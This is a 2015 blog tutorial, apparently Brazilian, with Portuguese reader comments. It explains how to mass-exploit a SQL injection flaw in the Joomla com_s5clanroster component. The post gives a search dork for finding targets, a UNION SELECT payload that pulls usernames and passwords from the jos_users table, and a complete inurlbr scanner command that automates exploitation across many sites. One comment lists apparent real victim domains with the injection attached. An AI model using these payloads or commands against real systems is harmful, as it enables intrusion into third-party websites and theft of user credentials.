segunda-feira, 6 de julho de 2015

Joomla S5 Clan Roster com_s5clanroster SQL Injection exploit

EXPLOIT MASS Joomla  - com_s5clanroster

USE INURLBR

In this tutorial we will use the inurlbr tool to find targets and then inject our string of exploration, We will use internal functions of inurlbr script to convert injection string in hexadecimal.  The com_s5clanroster compenet has a SQL injection flaw in their GET parameter "id", This article is based on the script written by the hacker TheLooper (script), Where injected successfully is possible to have access to the target server database information.

In this tutorial we will use the inurlbr tool to find targets and then inject our string of exploration, We will use internal functions of inurlbr script to convert injection string in hexadecimal.

The com_s5clanroster compenet has a SQL injection flaw in their GET parameter "id", This article is based on the script written by the hacker TheLooper (script), Where injected successfully is possible to have access to the target server database information.

DORK:
inurl:"index.php?option=com_s5clanroster"

SQL INJECTION:
%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(username,0x3a,password),222+from+jos_users--%20-

POC:
http://www.target.gov.br/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null{SQL INJECTION}

With access to this information we put together our command for mass exploitation.
Let's use the scanner inurlbr: 
http://github.com/googleinurl/SCANNER-INURLBR

SET DORK:
--dork 'inurl:"index.php?option=com_s5clanroster"'

SET FILE OUTPUT:
-s vuln.log

SET TIPE VALIDATION:
-t 3
       3   - The third type combine both first and second types:
              Then, of course, it also establishes connection with the exploit through the get method
              Demo: www.target.com.br{exploit}


SET EXPLOIT REQUEST - GET:
--exploit-get {YOU_GET}

Before setting the exploit we get to manipulate its string, for that we use a domestic function of inurlbr scanner so passes a validation string within the SQL injection to be able to separate vulnerable targets.

Internal function - Converting strings in hexadecimal
 hex Encrypt values in hex.
     Example: hex({value})
     Usage:   hex(102030)
     Usage:   --exploit-get 'user?id=hex(102030)'
     Result inject:
     http://www.target.gov.br/user?id=313032303330


--exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-'

hex(inurlbr_vuln) = 696e75726c62725f76756c6e 
hex(<br>) = 3c62723e
Example injection:
http://www.target.gov.br/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0x696e75726c62725f76756c6e,username,password,0x3c62723e),222+from+jos_users--%20-'

SET STRING VALIDATION:
Specify the string that will be used on the search script:
Example: -a {string}
Usage:   -a '<title>hello world</title>'
If specific value is found in the target he is considered vulnerable.
Setting:   -a 'inurlbr_vuln'
Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.
SET STRING VALIDATION: Specify the string that will be used on the search script: Example: -a {string} Usage:   -a '<title>hello world</title>' If specific value is found in the target he is considered vulnerable. Setting: -a 'inurlbr_vuln' Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.

COMMAND FULL:
php inurlbr.php --dork 'inurl:"index.php?option=com_s5clanroster"' -s vuln.log -t 3 --exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-'
-a 'inurlbr_vuln'

PRINT PROCESS:
COMMAND FULL: php inurlbr.php --dork 'inurl:"index.php?option=com_s5clanroster"' -s vuln.log -t 3 --exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-'  PRINT PROCESS:

6 comentários:

  1. De forma padrão, só se encontra um resultado e este não trás a senha consigo. rs

    ResponderExcluir
    Respostas
    1. www.meleeboys.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(
      )),222+from+jos_users--%20-
      www.skala-club.vn.ua/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(
      )),222+from+jos_users--%20-
      toxic.h5n1.free.fr/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(
      )),222+from+jos_users--%20-

      Excluir
    2. Olá amigo esse tudo é 80% mais pra mostrar a técnica que usei pra validar a falha, passando a string no sqli com function interna do script convertendo pra hexadecimal.
      Mas claramente dá pra usar em outros meios e CMS's.
      Pode ser usado até mesmo com uma wordlist cheia de sqli com padrão de SUB_PROCESS interno do scanner.
      Depois pesquisa sobre sub_process do scan INURLBR.
      Duvidas estamos ai :) ~ flw

      Excluir
  2. Valorizem nosso idioma, traduzam o conteúdo antes de postarem !

    ResponderExcluir
    Respostas
    1. O conteúdo sempre foi em PT-BR, mas devido utilização de muitas pessoas dos oriente médio, russos, chineses ... amigos de outros países.
      O inglês é linguá mais simples de se entender e padrão de tools em todo mundo.
      Não é uma questão de valorizar lingua x ou Y, mas sim uma questão de logica e simplicidade pra todo comunidade possa traduzir facilmente o conteúdo aqui postado.

      Excluir

............